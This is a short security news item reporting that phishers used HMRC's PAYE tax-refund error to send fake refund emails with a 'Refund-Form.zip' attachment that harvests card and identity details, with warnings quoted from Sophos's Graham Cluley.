Phishers exploiting HMRC tax error refund

Nearly ten million people have been affected by HMRC’s error, which occurred as the result of a new automated computer platform to update the PAYE (Pay As You Earn) tax system. HMRC is currently in the process of contacting people affected, though the body has long confirmed on its website it would “never send notifications of a tax rebate by email, or ask you to disclose personal or payment information by email”.

 

Sophos has intercepted emails that claim to come from HMRC with the subject line "You Have An HMRC Refund", informing recipients they have made overpayments. The email goes on to say that an attached form must be completed before a refund can be processed.  Attached to the email is a file called 'Refund-Form.zip', which contains an HTML file called 'Refund-Form.htm' which asks for information including credit card details, full date of birth, and mother's maiden name.

 

"If you do make the mistake of filling in the form, your confidential data is uploaded to a Chinese server.  You're not going to receive a windfall because of this form - you've just been phished," said Graham Cluley, senior technology consultant at Sophos.  

 

Cluley went on to reiterate HMRC’s warning that it would never inform people of a tax rebate via email or invite them to complete an online form to receive a rebate of tax:  “You have been warned - don't let your eagerness for a tax refund lead you to throw caution to the wind."